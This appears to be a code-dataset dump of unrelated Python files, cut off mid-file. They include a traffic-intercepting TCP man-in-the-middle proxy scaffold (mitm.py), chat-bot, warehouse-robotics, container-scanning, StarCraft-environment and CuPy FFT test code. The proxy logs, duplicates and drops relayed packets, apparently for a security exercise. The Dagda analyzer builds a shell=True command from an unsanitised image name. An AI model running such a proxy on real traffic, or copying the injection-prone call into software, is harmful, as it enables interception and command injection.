source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
mitm.py
|
#!/usr/bin/env python2
from __future__ import print_function
import traceback
import random
import socket
import argparse
import threading
import signal
import json
import requests
import sys
import time
from Queue import Queue
from contextlib import contextmanager
running = True
verbose = True
c2s = 0
s2c = 0
CLIENT2SERVER = 1
SERVER2CLIENT = 2
def log( m):
print( m, file=sys.stderr)
def mitm(buff, direction, shared):
"""
YOUR ATTACK GOES HERE
"""
shared.put({"type":"done"})
hb = "".join("{:02x}".format(ord(c)) for c in buff)
# hb = buff
if direction == CLIENT2SERVER:
log( "-> %s ->" % hb)
global c2s
c2s = c2s + 1
log("c2s %s" % str(c2s))
elif direction == SERVER2CLIENT:
log( "<- %s <-" % hb)
global s2c
s2c = s2c + 1
log("s2c %s" % str(s2c))
if direction == CLIENT2SERVER and c2s == 5:
buff = buff.append(buff)
elif direction == SERVER2CLIENT and s2c == 3:
buff = ""
return buff
#return "".join([ i if random.choice([True,False]) == True else '' for i in buff ])
#return "".join([ chr(ord(i) ^ 0x20) if ord(i) >= 0x41 and ord(i) <= 0x71 else i for i in buff])
@contextmanager
def ignored(*exceptions):
try:
yield
except exceptions:
pass
def killp(a, b):
with ignored(Exception):
a.shutdown(socket.SHUT_RDWR)
a.close()
b.shutdown(socket.SHUT_RDWR)
b.close()
return
def worker(client, server, n, shared):
while running == True:
b = ""
with ignored(Exception):
b = client.recv(4096)
if len(b) == 0:
killp(client,server)
return
try:
b = mitm(b,n, shared)
except:
pass
try:
server.send(b)
except:
killp(client,server)
return
killp(client,server)
return
def signalhandler(sn, sf):
global running
running = False
def doProxyMain(port, remotehost, remoteport):
signal.signal(signal.SIGTERM, signalhandler)
try:
shared = Queue()
p = threading.Thread(target=sendInput, args=(args.c, args.d,shared))
p.start()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", port))
s.listen(1)
workers = []
print("started")
sys.stdout.flush()
while running == True:
k,a = s.accept()
v = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
v.connect((remotehost, remoteport))
t1 = threading.Thread(target=worker, args=(k,v,CLIENT2SERVER, shared))
t2 = threading.Thread(target=worker, args=(v,k,SERVER2CLIENT, shared))
t2.start()
t1.start()
workers.append((t1,t2,k,v))
except Exception:
signalhandler(None, None)
# log("********exiting1*******")
for t1,t2,k,v in workers:
killp(k,v)
t1.join()
t2.join()
# log("********exiting2*******")
p.join()
# log("********exiting3*******")
return
def sendInput( host, port, shared):
global running
while running:
# log("********GETTING******* %s" % str(running))
try:
d = shared.get( block=True, timeout = 1)
time.sleep(1)
#log("got: %s" % str(d))
r = requests.post( "http://"+host+":"+str(port), data = {'REQUEST':json.dumps(d)})
log( r.text)
except:
time.sleep(1)
# log("********next*******")
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Proxy')
parser.add_argument('-p', type=int, default=4000, help="listen port")
parser.add_argument('-s', type=str, default="127.0.0.1", help="server ip address")
parser.add_argument('-q', type=int, default=3000, help="server port")
parser.add_argument('-c', type=str, default="127.0.0.1", help="command server")
parser.add_argument('-d', type=int, default=5000, help="command port")
args = parser.parse_args()
doProxyMain(args.p, args.s, args.q)
|
CommandsHandler.py
|
# Other
from threading import Thread
# Commands Interfaces
from source.commands.interfaces.BalanceInterface import BalanceInterface
from source.commands.interfaces.DoubleHelpInterface import DoubleHelpInterface
from source.commands.interfaces.GlobalTopInterface import GlobalTopInterface
from source.commands.interfaces.HelpInterface import HelpInterface
from source.commands.interfaces.NoGameInterface import NoGameInterface
from source.commands.interfaces.ResetInterface import ResetInterface
from source.commands.interfaces.RussianRouletteHelpInterface import RussianRouletteHelpInterface
from source.games.interface.DoubleInterface import DoubleInterface
from source.games.interface.RussianRouletteInterface import RussianRouletteInterface
from source.static.GameInterface import GameInterface
from source.vkapi.BotAPI import BotAPI
from source.commands.interfaces.DoCInterface import DoCInterface
class CommandsHandler:
def __init__(self, user_id, peer_id):
self.user_id = user_id
self.peer_id = peer_id
self.args = None
self.vk = BotAPI()
def identify_comma(self, comma):
if comma.startswith('/double'):
new_game = Thread(target=DoubleInterface.start, args=(self.peer_id,))
new_game.start()
elif comma.startswith('/balance'):
BalanceInterface.get(self.user_id, self.peer_id)
elif '/bet' in comma:
game = GameInterface.get_game(self.peer_id)
if not game:
NoGameInterface.init(self.peer_id, self.user_id)
elif game['game'] != 'double':
NoGameInterface.init(self.peer_id, self.user_id)
else:
game['interface'].bet(self.peer_id, self.user_id, comma)
elif '/DoC' in comma and self.user_id == 239125937:
DoCInterface.init(self.peer_id, comma)
elif comma.startswith('/help'):
HelpInterface.init(self.peer_id, self.user_id)
elif comma.startswith('/reset'):
ResetInterface.init(self.user_id, self.peer_id)
elif comma.startswith('/doubleh'):
DoubleHelpInterface.init(self.peer_id, self.user_id)
elif comma.startswith('/rrh'):
RussianRouletteHelpInterface.init(self.peer_id, self.user_id)
elif comma.startswith('/top'):
GlobalTopInterface.init(self.peer_id, self.user_id)
elif comma.startswith('/rr'):
new_game = Thread(target=RussianRouletteInterface.start, args=(self.peer_id,))
new_game.start()
elif comma.startswith('/rp'):
game = GameInterface.get_game(self.peer_id)
if not game:
NoGameInterface.init(self.peer_id, self.user_id)
else:
game['interface'].add_member(self.peer_id, self.user_id)
else:
return
|
ordercontroller.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved.
#
# This file is part of ewm-cloud-robotics
# (see https://github.com/SAP/ewm-cloud-robotics).
#
# This file is licensed under the Apache Software License, v. 2 except as noted
# otherwise in the LICENSE file (https://github.com/SAP/ewm-cloud-robotics/blob/master/LICENSE)
#
"""K8s custom resource handler for EWM warehouse orders."""
import logging
import threading
import time
from collections import OrderedDict
from typing import Dict, List, OrderedDict as TOrderedDict, Tuple
from cattr import structure
from robcoewmtypes.helper import get_sample_cr
from robcoewmtypes.warehouseorder import WarehouseOrderCRDSpec, WarehouseOrderCRDStatus
from k8scrhandler.k8scrhandler import K8sCRHandler
from .helper import RobotIdentifier
_LOGGER = logging.getLogger(__name__)
class OrderController(K8sCRHandler):
"""Handle K8s custom resources."""
def __init__(self, namespace: str) -> None:
"""Construct."""
# Processed warehouse order CRs dictionary
self._processed_orders: TOrderedDict[str, str] = OrderedDict()
self._processed_orders_lock = threading.RLock()
self._deleted_orders: TOrderedDict[str, bool] = OrderedDict()
template_cr = get_sample_cr('warehouseorder')
super().__init__(
'ewm.sap.com',
'v1alpha1',
'warehouseorders',
namespace,
template_cr,
{}
)
# Thread to check for deleted warehouse order CRs
self.deleted_warehouse_orders_thread = threading.Thread(
target=self._deleted_orders_checker)
# Register callbacks
self.register_callback(
'CleanupOrders', ['ADDED', 'MODIFIED', 'REPROCESS'], self._cleanup_orders_cb)
self.register_callback('DeletedOrders', ['DELETED'], self._order_deleted_cb)
def _cleanup_orders_cb(self, name: str, custom_res: Dict) -> None:
"""Cleanup processed warehouse order CRs."""
# No spec means nothing to update yet
if not custom_res.get('spec'):
return
# Clean up warehouse orders with order_status PROCESSED
if custom_res['spec'].get('order_status') == WarehouseOrderCRDSpec.STATE_PROCESSED:
# If CR already deleted, there is no need for a cleanup
if name in self._deleted_orders:
return
# Already in order_status PROCESSED no need for cleanup
if self._processed_orders.get(name) == WarehouseOrderCRDSpec.STATE_PROCESSED:
return
elif custom_res['spec'].get('order_status') == WarehouseOrderCRDSpec.STATE_RUNNING:
if self._processed_orders.get(name):
with self._processed_orders_lock:
self._processed_orders.pop(name, None)
if name in self._deleted_orders:
self._deleted_orders.pop(name, None)
# order_status RUNNING, no reason for cleanup
return
else:
_LOGGER.warning('Unknown order_status "%s"', custom_res['spec'].get('order_status'))
return
# OrderedDict must not be changed when iterating (self._processed_orders)
with self._processed_orders_lock:
# New in order_status PROCESSED
self._processed_orders[name] = WarehouseOrderCRDSpec.STATE_PROCESSED
# Delete warehouse orders with status PROCESSED
# Keep maximum of 50 warehouse_orders
processed = 0
delete_warehouse_orders = []
# Start counting from the back of warehouse order OrderedDict
for warehouse_order in reversed(self._processed_orders.keys()):
processed += 1
if processed > 50:
# Save warehouse_order to be deleted
delete_warehouse_orders.append(warehouse_order)
# Delete warehouse order CR
for warehouse_order in delete_warehouse_orders:
if self.check_cr_exists(warehouse_order):
self.delete_cr(warehouse_order)
self._deleted_orders[warehouse_order] = True
self._processed_orders.pop(warehouse_order, None)
_LOGGER.info('RobCo warehouse_order CR %s was cleaned up', warehouse_order)
else:
self._deleted_orders[warehouse_order] = True
self._processed_orders.pop(warehouse_order, None)
# Keep a maximum of 500 entries in deleted orders OrderedDict
to_remove = max(0, len(self._deleted_orders) - 500)
for _ in range(to_remove):
self._deleted_orders.popitem(last=False)
def _deleted_orders_checker(self) -> None:
"""Continously check for deleted warehouse_order CR and remove them from ordered dict."""
_LOGGER.info(
'Start continiously checking for deleted warehouse_order CRs')
while self.thread_run:
try:
self._check_deleted_orders()
except Exception as err: # pylint: disable=broad-except
_LOGGER.error(
'Error checking for deleted warehouse_orders: %s', err, exc_info=True)
# On uncovered exception in thread save the exception
self.thread_exceptions['deleted_warehouse_orders_checker'] = err
# Stop the watcher
self.stop_watcher()
finally:
# Wait 10 seconds
if self.thread_run:
time.sleep(10)
def _check_deleted_orders(self) -> None:
"""Remove self._processed_orders entries with no CR from ordered dictionary."""
cr_resp = self.list_all_cr()
_LOGGER.debug('%s/%s: Check deleted CR: Got all CRs.', self.group, self.plural)
# Collect names of all existing CRs
warehouse_order_crs = {}
for obj in cr_resp:
spec = obj.get('spec')
if not spec:
continue
metadata = obj.get('metadata')
warehouse_order_crs[metadata['name']] = True
# Compare with self._processed_orders
deleted_warehouse_orders = []
with self._processed_orders_lock:
for warehouse_order in self._processed_orders.keys():
if warehouse_order not in warehouse_order_crs:
deleted_warehouse_orders.append(warehouse_order)
for warehouse_order in deleted_warehouse_orders:
self._deleted_orders[warehouse_order] = True
self._processed_orders.pop(warehouse_order, None)
def run(self, reprocess: bool = False, multiple_executor_threads: bool = False) -> None:
"""Start running all callbacks."""
# If reprocessing is enabled, check for deleted warehouse order CRs too
if reprocess:
self.deleted_warehouse_orders_thread.start()
# start own callbacks
super().run(reprocess=reprocess, multiple_executor_threads=multiple_executor_threads)
def send_who_to_robot(self, robotident: RobotIdentifier, who: Dict) -> None:
"""Send the warehouse order to a robot."""
labels = {}
# Robot name and warehouse order CR names must be lower case
labels['cloudrobotics.com/robot-name'] = robotident.rsrc.lower()
name = '{lgnum}.{who}'.format(lgnum=who['lgnum'], who=who['who']).lower()
# Warehouse order are procssed by the robot in the sequence they are assigned to them
spec = {
'data': who,
'order_status': WarehouseOrderCRDSpec.STATE_RUNNING,
'sequence': time.time_ns()}
if self.check_cr_exists(name):
_LOGGER.debug('Warehouse order CR "%s" exists. Update it', name)
cr_old = self.get_cr(name)
robot_old = cr_old['metadata'].get('labels', {}).get('cloudrobotics.com/robot-name')
order_status_old = cr_old['spec'].get('order_status')
# Keep the sequence if it is set and order_status or robot-name label did not change
if robot_old == robotident.rsrc.lower() and order_status_old == spec['order_status']:
spec['sequence'] = cr_old['spec'].get('sequence', 0)
# Update CR
self.update_cr_spec(name, spec, labels)
else:
_LOGGER.debug('Warehouse order CR "%s" not existing. Create it', name)
spec['sequence'] = time.time_ns()
self.create_cr(name, labels, spec)
def cleanup_who(self, who: Dict) -> None:
"""Cleanup warehouse order when it was finished."""
# Warehouse orders to be deleted
to_be_closed = []
# Delete warehouse order
# Warehouse order CR name must be lower case
name = '{lgnum}.{who}'.format(lgnum=who['lgnum'], who=who['who']).lower()
to_be_closed.append(name)
spec_order_processed = {'data': who, 'order_status': WarehouseOrderCRDSpec.STATE_PROCESSED}
if self.check_cr_exists(name):
self.update_cr_spec(name, spec_order_processed)
_LOGGER.info(
'Cleanup successfull, warehouse order CR "%s" in order_status %s', name,
WarehouseOrderCRDSpec.STATE_PROCESSED)
else:
_LOGGER.warning('Warehouse order CR "%s" does not exist, unable to clean up', name)
# Delete sub warehouse orders if existing
crs = self.list_all_cr()
for obj in crs:
spec = obj.get('spec')
if not spec:
continue
# Delete warehouse order if its top warehouse order
# was deleted in this step
if (spec['data']['topwhoid'] == who['who']
and spec['data']['lgnum'] == who['lgnum']):
# Warehouse order CR name must be lower case
name = '{lgnum}.{who}'.format(
lgnum=spec['data']['lgnum'], who=spec['data']['who']).lower()
to_be_closed.append(name)
if self.check_cr_exists(name):
self.update_cr_spec(name, spec_order_processed)
_LOGGER.info(
'Cleanup successfull, warehouse order CR "%s" in order_status %s',
name, WarehouseOrderCRDSpec.STATE_PROCESSED)
else:
_LOGGER.warning(
'Warehouse order CR "%s" does not exist, unable to clean up', name)
def _order_deleted_cb(self, name: str, custom_res: Dict) -> None:
"""Remove deleted CR from self._processed_orders."""
self._deleted_orders[name] = True
if self._processed_orders.get(name):
with self._processed_orders_lock:
# When warehouse order CR was deleted remove it from ordered dictionary
self._processed_orders.pop(name, None)
def save_processed_status(self, name: str, custom_res: Dict) -> None:
"""Save processed custom resource status in spec.process_status."""
# No status means nothing to update yet
if not custom_res.get('status'):
return
if self.check_cr_exists(name):
# Only if changed
if custom_res['spec'].get('process_status') != custom_res[
'status'].get('data'):
data_processed = {'process_status': custom_res['status']['data']}
self.update_cr_spec(name, data_processed)
def check_for_running_whos(self, robot: str) -> bool:
"""Check if there are RUNNING warehouse orders for the robot."""
crs = self.list_all_cr()
for c_res in crs:
if (c_res['metadata'].get('labels', {}).get('cloudrobotics.com/robot-name') == robot
and c_res['spec'].get('order_status') == WarehouseOrderCRDSpec.STATE_RUNNING):
return True
return False
def get_running_whos(
self, robot: str) -> List[Tuple[WarehouseOrderCRDSpec, WarehouseOrderCRDStatus]]:
"""Get running warehouse orders of a robot."""
whos = []
crs = self.list_all_cr()
for c_res in crs:
if (c_res['metadata'].get('labels', {}).get('cloudrobotics.com/robot-name') == robot
and c_res['spec'].get('order_status') == WarehouseOrderCRDSpec.STATE_RUNNING):
who_spec = structure(c_res['spec'], WarehouseOrderCRDSpec)
if c_res.get('status', {}).get('data') is not None:
who_status = structure(c_res['status'], WarehouseOrderCRDStatus)
else:
who_status = WarehouseOrderCRDStatus()
whos.append((who_spec, who_status))
return whos
|
analyzer.py
|
#
# Licensed to Dagda under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Dagda licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import requests
import json
import traceback
import subprocess
from subprocess import check_output
from threading import Thread
from analysis.static.os import os_info_extractor
from analysis.static.dependencies import dep_info_extractor
from analysis.static.av import malware_extractor
from api.internal.internal_server import InternalServer
from log.dagda_logger import DagdaLogger
from analysis.static.util.utils import extract_filesystem_bundle
from analysis.static.util.utils import clean_up
# Analyzer class
class Analyzer:
# -- Public methods
# Analyzer Constructor
def __init__(self, dagda_server_url=None):
super(Analyzer, self).__init__()
self.is_remote = False
if dagda_server_url is not None:
self.dagda_server_url = dagda_server_url
self.is_remote = True
else:
self.mongoDbDriver = InternalServer.get_mongodb_driver()
self.dockerDriver = InternalServer.get_docker_driver()
# Evaluate image from image name or container id
def evaluate_image(self, image_name, container_id):
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('ENTRY to the method for analyzing a docker image')
# Init
data = {}
# -- Static analysis
image_name = self.dockerDriver.get_docker_image_name_by_container_id(container_id) if container_id \
else image_name
#call klar to get result
os_packages = []
malware_binaries = []
dependencies = []
temp_dir = None
vulnerabilities = []
try:
# Get OS packages
# if InternalServer.is_debug_logging_enabled():
# DagdaLogger.get_logger().debug('Retrieving OS packages from the docker image ...')
#
# if container_id is None: # Scans the docker image
# os_packages = os_info_extractor.get_soft_from_docker_image(docker_driver=self.dockerDriver,
# image_name=image_name)
# temp_dir = extract_filesystem_bundle(docker_driver=self.dockerDriver,
# image_name=image_name)
# else: # Scans the docker container
# os_packages = os_info_extractor.get_soft_from_docker_container_id(docker_driver=self.dockerDriver,
# container_id=container_id)
# temp_dir = extract_filesystem_bundle(docker_driver=self.dockerDriver,
# container_id=container_id)
#
# if InternalServer.is_debug_logging_enabled():
# DagdaLogger.get_logger().debug('OS packages from the docker image retrieved')
# Get malware binaries in a parallel way
temp_dir = extract_filesystem_bundle(docker_driver=self.dockerDriver,
image_name=image_name)
malware_thread = Thread(target=Analyzer._threaded_malware, args=(self.dockerDriver, temp_dir,
malware_binaries))
malware_thread.start()
vuln_thread = Thread(target=Analyzer._threaded_klar, args=( image_name, vulnerabilities))
vuln_thread.start()
# Get programming language dependencies in a parallel way
#dependencies_thread = Thread(target=Analyzer._threaded_dependencies, args=(self.dockerDriver, image_name,
# temp_dir, dependencies))
#dependencies_thread.start()
# Waiting for the threads
malware_thread.join()
vuln_thread.join()
#dependencies_thread.join()
except Exception as ex:
message = "Unexpected exception of type {0} occurred: {1!r}"\
.format(type(ex).__name__, ex.get_message() if type(ex).__name__ == 'DagdaError' else ex.args)
DagdaLogger.get_logger().error(message)
if InternalServer.is_debug_logging_enabled():
traceback.print_exc()
data['status'] = message
# -- Cleanup
if temp_dir is not None:
clean_up(temporary_dir=temp_dir)
# -- Prepare output
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Preparing analysis output ...')
if 'status' not in data or data['status'] is None:
data['status'] = 'Completed'
data['image_name'] = image_name
data['timestamp'] = datetime.datetime.now().timestamp()
#data['static_analysis'] = self.generate_static_analysis(image_name, os_packages, dependencies, malware_binaries)
data['static_analysis'] = self.generate_static_analysis(image_name, malware_binaries, vulnerabilities )
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Analysis output completed')
# -- Return
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('EXIT from the method for analyzing a docker image')
return data
# Generates the result of the static analysis os_packages, dependencies,
def generate_static_analysis(self, image_name, malware_binaries, klar_output):
data = {}
#data['os_packages'] = self.generate_os_report(image_name, os_packages)
#data['prog_lang_dependencies'] = self.generate_dependencies_report(image_name, dependencies)
data['malware_binaries'] = malware_binaries
if len(klar_output)>0:
vulns = klar_output[0]["Vulnerabilities"]
if vulns:
vulns['criticalCount']=0
vulns['isCritical']=False
vulns['defcon1Count']= 0
vulns['highCount']=0
vulns['mediumCount']=0
vulns['lowCount']=0
if 'Critical' in vulns:
vulns['criticalCount']= len(vulns['Critical'])
vulns['isCritical']=True
if 'Defcon1' in vulns:
vulns['defcon1Count']= len(vulns['Defcon1'])
vulns['isCritical']=True
if 'High' in vulns:
vulns['highCount']=len(vulns['High'])
if 'Medium' in vulns:
vulns['mediumCount']= len(vulns['Medium'])
if 'Low' in vulns:
vulns['lowCount'] = len(vulns['Low'])
vulns['LayerCount']=klar_output[0]["LayerCount"]
data['vulnerabilities']=vulns
return data
# Generates dependencies report
def generate_dependencies_report(self, image_name, dependencies):
data = {}
dep_details = {}
dep_details['java'] = []
dep_details['python'] = []
dep_details['nodejs'] = []
dep_details['js'] = []
dep_details['ruby'] = []
dep_details['php'] = []
fp_count = 0
for dependency in dependencies:
d = {}
splitted_dep = dependency.split("#")
d['product'] = splitted_dep[1]
d['version'] = splitted_dep[2]
d['product_file_path'] = splitted_dep[3]
d['vulnerabilities'] = self.get_vulnerabilities(d['product'], d['version'])
d['is_vulnerable'] = True
d['is_false_positive'] = self.is_fp(image_name, d['product'], d['version'])
if d['is_false_positive']:
fp_count += 1
dep_details[splitted_dep[0]].append(d)
# Prepare output
data['vuln_dependencies'] = len(dep_details['java']) + len(dep_details['python']) + \
len(dep_details['nodejs']) + len(dep_details['js']) + \
len(dep_details['ruby']) + len(dep_details['php']) - fp_count
data['dependencies_details'] = dep_details
# Return
return data
# Generates os report
def generate_os_report(self, image_name, os_packages):
data = {}
products_status = []
vuln_products = 0
fp_count = 0
for package in os_packages:
p = {}
p['product'] = package['product']
p['version'] = package['version']
p['vulnerabilities'] = self.get_vulnerabilities(package['product'], package['version'])
if len(p['vulnerabilities']) > 0:
p['is_vulnerable'] = True
vuln_products += 1
else:
p['is_vulnerable'] = False
p['is_false_positive'] = self.is_fp(image_name, package['product'], package['version'])
if p['is_false_positive']:
fp_count += 1
products_status.append(p)
# Prepare output
vuln_products -= fp_count
data['total_os_packages'] = len(products_status)
data['vuln_os_packages'] = vuln_products
data['ok_os_packages'] = data['total_os_packages'] - vuln_products
data['os_packages_details'] = products_status
# Return
return data
# Gets vulnerabilities by product and version
def get_vulnerabilities(self, product, version):
if not self.is_remote:
return self.mongoDbDriver.get_vulnerabilities(product, version)
else:
if product is not None:
product += '/' + version
r = requests.get(self.dagda_server_url + '/vuln/products/' + product)
if r.status_code == 200:
return json.loads(r.content.decode('utf-8'))
return []
# Check if it is a false positive
def is_fp(self, image_name, product, version):
if not self.is_remote:
return self.mongoDbDriver.is_fp(image_name, product, version)
else:
if product is not None:
product += '/' + version
r = requests.get(self.dagda_server_url + '/history/' + image_name + '/fp/' + product)
return r.status_code == 204
# Get malware binaries thread
@staticmethod
def _threaded_malware(dockerDriver, temp_dir, malware_binaries):
# Get malware binaries
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Retrieving malware files from the docker image ...')
malware_binaries.extend(malware_extractor.get_malware_included_in_docker_image(docker_driver=dockerDriver,
temp_dir=temp_dir))
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Malware files from the docker image retrieved')
# Get vulnerabilties from clair using klar tool
@staticmethod
def _threaded_klar( image_name, vulnerabilities):
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Retrieving vulnerabilities report from klar ...')
result = subprocess.run('/klar '+ image_name, executable='/bin/ash', shell=True, stdout=subprocess.PIPE)
#output=json.loads(result.stdout)
output= result.stdout.decode('utf-8');
vulnerabilities.append(json.loads(output))
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('vulnerabilities report from klar retreived ...')
DagdaLogger.get_logger().debug(' vulnerabilities generated: '+output)
# Get programming language dependencies thread
@staticmethod
def _threaded_dependencies(dockerDriver, image_name, temp_dir, dependencies):
# Get programming language dependencies
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Retrieving dependencies from the docker image ...')
dependencies.extend(dep_info_extractor.get_dependencies_from_docker_image(docker_driver=dockerDriver,
image_name=image_name,
temp_dir=temp_dir))
if InternalServer.is_debug_logging_enabled():
DagdaLogger.get_logger().debug('Dependencies from the docker image retrieved')
|
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from . import VecEnv
from pysc2.env import environment
from pysc2.env import sc2_env
from pysc2.lib import features, actions
_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index
_SELECTED = features.SCREEN_FEATURES.selected.index
from common import common
def worker(remote, map_name, nscripts, i):
with sc2_env.SC2Env(
map_name=map_name,
step_mul=2,
screen_size_px=(32, 32),
minimap_size_px=(32, 32)) as env:
available_actions = []
result = None
group_list = []
xy_per_marine = {}
while True:
cmd, data = remote.recv()
if cmd == 'step':
reward = 0
if len(group_list) == 0 or common.check_group_list(env, result):
print("init group list")
result, xy_per_marine = common.init(env, result)
group_list = common.update_group_list(result)
action1 = data[0][0]
action2 = data[0][1]
# func = actions.FUNCTIONS[action1[0]]
# print("agent(",i," ) action : ", action1, " func : ", func)
func = actions.FUNCTIONS[action2[0]]
# print("agent(",i," ) action : ", action2, " func : ", func)
result = env.step(actions=[action1])
reward += result[0].reward
done = result[0].step_type == environment.StepType.LAST
move = True
if len(action2[1]) == 2:
x, y = action2[1][1]
# print("x, y:", x, y)
# if x == 0 and y == 0:
# move = False
if (331 in available_actions and move and not done):
try:
result = env.step(actions=[action2])
reward += result[0].reward
done = result[0].step_type == environment.StepType.LAST
except Exception as e:
print("e :", e)
ob = (result[0].observation["screen"][
_PLAYER_RELATIVE:_PLAYER_RELATIVE + 1] == 3).astype(int)
# (1, 32, 32)
selected = result[0].observation["screen"][
_SELECTED:_SELECTED + 1] # (1, 32, 32)
# extra = np.zeros((1, 32, 32))
control_groups = result[0].observation["control_groups"]
army_count = env._obs[0].observation.player_common.army_count
available_actions = result[0].observation["available_actions"]
info = result[0].observation["available_actions"]
if done:
result = env.reset()
if len(group_list) == 0 or common.check_group_list(env, result):
# print("init group list")
result, xy_per_marine = common.init(env, result)
group_list = common.update_group_list(result)
info = result[0].observation["available_actions"]
if len(action1[1]) == 2:
group_id = action1[1][1][0]
player_y, player_x = (result[0].observation["screen"][
_SELECTED] == 1).nonzero()
if len(player_x) > 0:
if (group_id == 1):
xy_per_marine["1"] = [int(player_x.mean()), int(player_y.mean())]
else:
xy_per_marine["0"] = [int(player_x.mean()), int(player_y.mean())]
remote.send((ob, reward, done, info, army_count,
control_groups, selected, xy_per_marine))
elif cmd == 'reset':
result = env.reset()
reward = 0
if len(group_list) == 0 or common.check_group_list(env, result):
# print("init group list")
result, xy_per_marine = common.init(env, result)
group_list = common.update_group_list(result)
reward += result[0].reward
ob = (result[0].observation["screen"][
_PLAYER_RELATIVE:_PLAYER_RELATIVE + 1] == 3).astype(int)
selected = result[0].observation["screen"][
_SELECTED:_SELECTED + 1] # (1, 32, 32)
# extra = np.zeros((1, 32, 32))
control_groups = result[0].observation["control_groups"]
army_count = env._obs[0].observation.player_common.army_count
done = result[0].step_type == environment.StepType.LAST
info = result[0].observation["available_actions"]
available_actions = result[0].observation["available_actions"]
remote.send((ob, reward, done, info, army_count,
control_groups, selected, xy_per_marine))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.action_spec().functions[data], ""))
elif cmd == "action_spec":
remote.send((env.action_spec().functions[data]))
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, nenvs, nscripts, map_name):
"""
envs: list of gym environments to run in subprocesses
"""
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = []
i = 0
for (work_remote, ) in zip(self.work_remotes, ):
self.ps.append(
Process(target=worker, args=(work_remote, map_name, nscripts, i)))
i += 1
#
# self.ps = [Process(target=worker, args=(work_remote, (map_name)))
# for (work_remote,) in zip(self.work_remotes,)]
for p in self.ps:
p.start()
self.remotes[0].send(('get_spaces', 1))
self.action_space, self.observation_space = self.remotes[0].recv()
#print("action_space: ", self.action_space, " observation_space: ", self.observation_space)
def step(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', [action]))
results = [remote.recv() for remote in self.remotes]
obs, rews, dones, infos, army_counts, control_groups, selected, xy_per_marine = zip(
*results)
return np.stack(obs), np.stack(rews), np.stack(
dones), infos, army_counts, control_groups, np.stack(
selected), xy_per_marine
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
results = [remote.recv() for remote in self.remotes]
obs, rews, dones, infos, army_counts, control_groups, selected, xy_per_marine = zip(
*results)
return np.stack(obs), np.stack(rews), np.stack(
dones), infos, army_counts, control_groups, np.stack(
selected), xy_per_marine
def action_spec(self, base_actions):
for remote, base_action in zip(self.remotes, base_actions):
remote.send(('action_spec', base_action))
results = [remote.recv() for remote in self.remotes]
return results
def close(self):
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
@property
def num_envs(self):
return len(self.remotes)
|
test_fft.py
|
import functools
import unittest
import pytest
import numpy as np
import cupy
from cupy import testing
from cupy.fft import config
from cupy.fft.fft import _default_fft_func, _fft, _fftn
import six
def nd_planning_states(states=[True, False], name='enable_nd'):
"""Decorator for parameterized tests with and wihout nd planning
Tests are repeated with config.enable_nd_planning set to True and False
Args:
states(list of bool): The boolean cases to test.
name(str): Argument name to which specified dtypes are passed.
This decorator adds a keyword argument specified by ``name``
to the test fixture. Then, it runs the fixtures in parallel
by passing the each element of ``dtypes`` to the named
argument.
"""
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
# get original global planning state
planning_state = config.enable_nd_planning
try:
for nd_planning in states:
try:
# enable or disable nd planning
config.enable_nd_planning = nd_planning
kw[name] = nd_planning
impl(self, *args, **kw)
except Exception:
print(name, 'is', nd_planning)
raise
finally:
# restore original global planning state
config.enable_nd_planning = planning_state
return test_func
return decorator
@testing.parameterize(*testing.product({
'n': [None, 0, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho', ''],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFft(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft alway returns np.complex128
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
# NumPy 1.17.0 and 1.17.1 raises ZeroDivisonError due to a bug
@testing.with_requires('numpy!=1.17.0')
@testing.with_requires('numpy!=1.17.1')
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(*testing.product({
'shape': [(10, 10), (10, 5, 10)],
